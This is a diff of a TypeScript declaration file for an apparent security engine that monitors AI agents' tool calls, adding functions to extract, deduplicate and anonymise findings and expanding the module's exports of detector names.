declare function extractSessionLevelFindings(calls: ReadonlyArray<SessionToolCall>, ctx: SessionExtractContext): CanonicalFinding[];
|
|
924
|
+
/**
|
|
925
|
+
* Collapse equivalent findings into one row, summing occurrenceCount and
|
|
926
|
+
* spreading firstSeenAt / lastSeenAt across the matches. Dedupe key is
|
|
927
|
+
* (type, ruleName, command-preview, project, agent) — same shape scan.ts
|
|
928
|
+
* uses today (line 502), with `agent` added so cross-agent matches stay
|
|
929
|
+
* separated for the dashboard's per-agent breakdown.
|
|
930
|
+
*/
|
|
931
|
+
declare function dedupeCanonicalFindings(findings: ReadonlyArray<CanonicalFinding>): CanonicalFinding[];
|
|
932
|
+
/**
|
|
933
|
+
* Project a CanonicalFinding into the privacy-safe ScanFinding shape the
|
|
934
|
+
* proxy sends to the SaaS. Drops `input`, `redactedSample`, `commandPreview`,
|
|
935
|
+
* `subjectPath` — anything that could carry user content. Counts and pattern
|
|
936
|
+
* names only, matching the privacy invariant in scan/index.ts.
|
|
937
|
+
*
|
|
938
|
+
* Returns null if the type doesn't have a corresponding ScanFinding bucket
|
|
939
|
+
* (currently `smart-rule` and `ast-fs-op` — those carry a user-defined or
|
|
940
|
+
* shield rule name and aren't part of the count-based summary).
|
|
941
|
+
*/
|
|
942
|
+
declare function toScanFinding(c: CanonicalFinding): ScanFinding | null;
|
|
943
|
+
declare function previewArgs(input: Record<string, unknown>, max: number): string;
|
|
944
|
+
|
|
412
945
|
/** Engine version stamped on audit entries for future drift detection. */
|
|
413
|
-
declare const ENGINE_VERSION = "1.
|
|
946
|
+
declare const ENGINE_VERSION = "1.4.0";
|
|
414
947
|
|
|
415
|
-
export { BUILTIN_SHIELDS, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, FLAGS_WITH_VALUES, LOOP_MAX_RECORDS, type LoopWindowEvaluation, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SENSITIVE_PATH_REGEXES, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallRecord, analyzePipeChain, analyzeShellCommand, checkDangerousSql, computeArgsHash, detectDangerousEval, detectDangerousShellExec, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractNetworkTargets, extractPositionalArgs, getCompiledRegex, getNestedValue, isIgnoredTool, isShieldVerdict, matchSensitivePath, matchesPattern, normalizeCommandForPolicy, parseAllSshHostsFromCommand, redactText, scanArgs, scanText, sensitivePathMatch, validateOverrides, validateRegex, validateShieldDefinition };
|
|
948
|
+
export { AST_FS_REGEX_RULES, type AuditEntryForClassify, BASH_TOOL_NAMES, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, CANONICAL_EXTRACTOR_HASH, CANONICAL_EXTRACTOR_VERSION, COST_PER_LOOP_ITER_USD, type CanonicalAgent, type CanonicalFinding, type CanonicalFindingType, type CanonicalSourceType, DESTRUCTIVE_OP_RE, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, type ExtractContext, FILE_TOOLS, FLAGS_WITH_VALUES, type FsOpVerdict, LONG_OUTPUT_THRESHOLD_BYTES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, PRIVILEGE_ESCALATION_RE, type PiiPattern, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_RE, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type SessionExtractContext, type SessionToolCall, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallEntry, type ToolCallRecord, analyzeFsOperation, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, dedupeCanonicalFindings, detectDangerousEval, detectDangerousShellExec, detectPii, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractCanonicalFindings, extractNetworkTargets, extractPositionalArgs, extractSessionLevelFindings, getCompiledRegex, getNestedValue, isBashTool, isIgnoredTool, isProtectedHomePath, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, previewArgs, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, toScanFinding, truncateBlastPath, validateOverrides, validateRegex, validateShieldDefinition };
|